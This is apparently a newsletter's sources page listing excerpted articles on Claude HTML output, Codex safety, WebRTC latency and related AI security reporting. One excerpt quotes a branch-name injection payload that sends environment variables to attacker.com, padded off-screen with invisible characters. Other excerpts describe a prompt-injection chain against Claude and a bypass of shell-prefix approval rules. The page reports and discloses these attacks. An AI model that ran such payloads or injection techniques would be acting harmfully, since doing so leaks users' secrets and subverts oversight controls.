JS Wei (Jack) Sun

Claude pushes HTML at 18×, OpenAI ships Codex safety post, Curley flags WebRTC

Every URL the pipeline pulled into ranking for this issue — primary sources plus the supporting and contradicting findings each Researcher returned. Inline citations in the issue point back here.

← Back to the issue

Sources

Using Claude Code: The Unreasonable Effectiveness of HTML simonwillison.net

Using Claude Code: The Unreasonable Effectiveness of HTML Thought-provoking piece by Thariq Shihipar (on the Claude Code team at Anthropic) advocating for HTML over Markdown as an output format to request from Claude. The article is crammed with interesting examples (collected on this site ) and prompt suggestions like this one: Help me review this PR by creating an HTML artifact that describes it. I’m not very familiar with the streaming/backpressure logic so focus on that. Render the actual d…

Running Codex safely at OpenAI openai.com

How OpenAI runs Codex securely with sandboxing, approvals, network policies, and agent-native telemetry to support safe and compliant coding agent adoption.

Quoting Luke Curley simonwillison.net

WebRTC is designed to degrade and drop my prompt during poor network conditions. wtf my dude WebRTC aggressively drops audio packets to keep latency low. If you’ve ever heard distorted audio on a conference call, that’s WebRTC baybee. The idea is that conference calls depend on rapid back-and-forth, so pausing to wait for audio is unacceptable. …but as a user, I would much rather wait an extra 200ms for my slow/expensive prompt to be accurate. After all, I’m paying good money to boil the ocean,…

Chrome’s 4GB AI model isn’t new, but you’re not wrong for being confused arstechnica.com

Chrome’s 4GB local Gemini Nano download isn’t a new addition, despite renewed user confusion — the model has been quietly shipping with the browser to power on-device AI features, and Ars walks through the opaque settings users can toggle to remove it.

References

RecSys Frontier (AI Daily 2026-05-09) recsys-frontier.com

A comparison of the Cloudflare blog found that the HTML version consumed over 72,000 tokens, while the equivalent Markdown version required fewer than 4,000 — a 94.9% reduction.

Medium — Optimal Prompt Formats for LLMs (Dupree) medium.com

XML is frequently the worst performer in reasoning-heavy benchmarks. Its repetitive tag structure is token-inefficient and can cause ‘attention diffusion,’ where the model’s focus is diluted by redundant characters.

TechRadar — Claude AI vulnerabilities techradar.com

The ‘Claudy Day’ attack sequence combined an open redirect on claude.com with invisible prompt injection via URL parameters… untrusted JavaScript within an Artifact could perform silent API calls using the viewing user’s authenticated session.

ImprovingAgents — Best Nested Data Format improvingagents.com

If an LLM is asked for an ‘answer’ field before a ‘reasoning’ field… accuracy drops precipitously because the model cannot utilize its auto-regressive property to ‘think through’ the problem before committing to a result.

baoyu.io translation of Shihipar thread baoyu.io

Examples include a ‘Corporate Translator’ with a Windows 95-style UI, design-system prototypes with live sliders, and PR review dashboards with color-coded diffs and margin annotations.

Tactiq — Claude system prompt analysis tactiq.io

Claude’s internal system prompt explicitly mandates Markdown for code snippets… and is trained to avoid excessive Markdown or list formatting in casual ‘chit-chat’ scenarios.

HackRead — BeyondTrust Codex token-theft disclosure hackread.com

By crafting a branch name containing backticks or semicolons—such as main; curl attacker.com/$(env | base64)—an attacker could execute arbitrary code… 94 Ideographic Space characters (U+3000) followed by || true … pushed off-screen in the Codex and ChatGPT web interfaces.

VentureBeat — ‘Six exploits broke AI coding agents’ venturebeat.com

Researchers identified a critical sandbox escape (CVE-2026-305) involving improper isolation in the JavaScript runtime, which allowed remote attackers to execute code in the user’s context.

azukiazusa.dev — Codex sandbox & agent authorization writeup azukiazusa.dev

If rules are too broad—such as auto-approving any command starting with a shell like /usr/bin/zsh—the prefix_rule becomes effectively useless, as an attacker can simply wrap malicious payloads inside the permitted prefix.

Trail of Bits — ‘Insecure credential storage plagues MCP’ blog.trailofbits.com

approximately 48-53% of reviewed MCP servers recommend or implement insecure storage methods, such as hardcoding API keys in .env or JSON configuration files… claude_desktop_config.json … has been observed to have world-readable permissions on macOS.

Cybernews — Huntress on Codex triggering EDR false positives cybernews.com

Codex’s legitimate troubleshooting actions can mimic attacker tradecraft, triggering false positives in EDR systems and complicating incident response.

GitHub issue #45994 (Codex CLI prefix_rule brittleness) github.com

prefix_rule matching often fails when commands are shell-wrapped (e.g., /bin/zsh -lc) or preceded by environment variables … results in repetitive approval prompts and overly specific rules.

Luke Curley, moq.dev (original post) moq.dev

It is impossible to even retransmit a WebRTC audio packet within a browser; we tried at Discord. The implementation is hard-coded for real-time latency or else.

Philipp Hancke, webrtcHacks (measurement post) webrtchacks.com

Median response latency of approximately 1.7 to 1.8 seconds… STUN RTTs of 60-70ms and bumps in the data suggesting packet loss

eesel.ai — Realtime API vs WebRTC eesel.ai

WebRTC (UDP) typically achieves ~150ms vs 200ms+ for WebSockets… direct client-side WebSocket connections risk leaking long-lived API keys, whereas WebRTC uses 60-second ephemeral keys

Ant Group / AntRTC, IETF 125 MoQ slides datatracker.ietf.org

Production deployment for Taobao Voice Search and Alipay AI Assistants reports smoother interactions under 30%+ packet-loss conditions and lower first-frame latency than WebRTC for cloud-rendered digital avatars

Forasoft — MoQ Streaming 2026 forasoft.com

Production-grade MoQ relays are delivering 200–300ms glass-to-glass latency… WHIP/WHEP (WebRTC-based) is more mature but up to 15x more expensive to scale than MoQ’s relay-based model

r/programming discussion on Curley’s post reddit.com

Critics from the WebRTC community, including creators of the Pion library, argue connection establishment can be reduced to significantly fewer than eight RTTs and that WebRTC remains the only robust way to handle Acoustic Echo Cancellation out of the box

Jack Sun

Jack Sun, writing.

Engineer · Bay Area

Hands-on with agentic AI all day — building frameworks, reading what industry ships, occasionally writing them down.

Digest
All · AI Tech · AI Research · AI News
Writing
Essays
Elsewhere
Subscribe
All · AI Tech · AI Research · AI News · Essays

© 2026 Wei (Jack) Sun · jacksunwei.me Built on Astro · hosted on Cloudflare